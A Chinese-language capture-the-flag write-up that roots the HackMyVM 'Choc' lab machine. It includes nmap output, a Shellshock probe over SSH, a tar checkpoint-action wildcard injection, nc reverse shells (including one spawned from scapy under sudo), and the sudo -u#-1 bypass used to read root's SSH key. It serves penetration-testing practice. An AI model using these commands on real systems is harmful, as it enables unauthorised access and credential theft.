打靶记录(九九)之HMVChoc

所渗透的靶机IP为192.168.56.124

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.124
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 09:25 UTC
Nmap scan report for 192.168.56.124 (192.168.56.124)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
MAC Address: 08:00:27:24:ED:C3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.17 seconds

sudo nmap -sT -sV -sC -O -p21,22 192.168.56.124    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 09:30 UTC
Nmap scan report for 192.168.56.124 (192.168.56.124)
Host is up (0.00025s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0            1811 Apr 20  2021 id_rsa [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.102
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 c5:66:48:ee:7b:a9:ef:e1:20:26:c5:a8:bf:c5:4d:5c (RSA)
|   256 80:46:cd:47:a1:ce:a7:fe:56:36:4f:f7:d1:ed:92:c0 (ECDSA)
|_  256 a2:83:db:7a:7d:38:70:e6:00:16:71:29:ee:04:73:aa (ED25519)
MAC Address: 08:00:27:24:ED:C3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds

FTP匿名登录之后能得到一个私钥，原本想要爆破将结果发现没有密码

将私钥base64解码在结尾得到用户名和主机carl@choc

但是一连上去就被关闭了，也许存在一个脚本不让ssh连接。

ssh -i id_rsa carl@choc '() { : ;};echo vulnerable'

发现存在shellshock漏洞，做一个反弹shell

还有torki和sarah用户

bash -version

版本是4.3，符合shellshock利用

在/tmp目录发现一个备份，解包

tar -xvf backup_home.tgz

里面有个diary.txt，但是有点意义不明

在torki家目录的secretgarden里面也有一份一样的文件，并且有个备份脚本，盲猜是用于备份secretgarden里的东西到/tmp下的压缩包

这种计划任务基本上就可以用checkpoint的方式了，并且在secretgarden目录是有权限的

在/home/torki/secret_garden目录:

touch ./--checkpoint=1

echo 'nc -e /bin/bash 192.168.56.102 1234'>shell.sh

touch './--checkpoint-action=exec=sh shell.sh'

chmod +x shell.sh

开启监听，收到了torki身份的shell会话

/usr/local/bin/sudo -l
User torki may run the following commands on choc:
    (sarah) NOPASSWD: /usr/bin/scapy

/usr/local/bin/sudo -u sarah /usr/bin/scapy

os.system('nc -e /bin/bash 192.168.56.102 1235')

现在我们是sarah，在家目录找到.note:fuckmeplease，是sarah的密码

sudo -l
User sarah may run the following commands on choc:
   !root NOPASSWD: /usr/bin/wall

发现不能以root身份执行,但是可以利用这个sudo 1.8.27 - Security Bypass，应该是1.8.27之前的版本都能用，用于绕过!root的限制

wall指令能够用于读取任意文件

sudo -u#-1 wall --nobanner "/root/.ssh/id_rsa"

在本地存为key，但是需要去除每一行最后的空格,制表符

sed -i 's/[[:space:]]*$//' key

chmod 600 key 

ssh -i key root@choc

现在我们是root!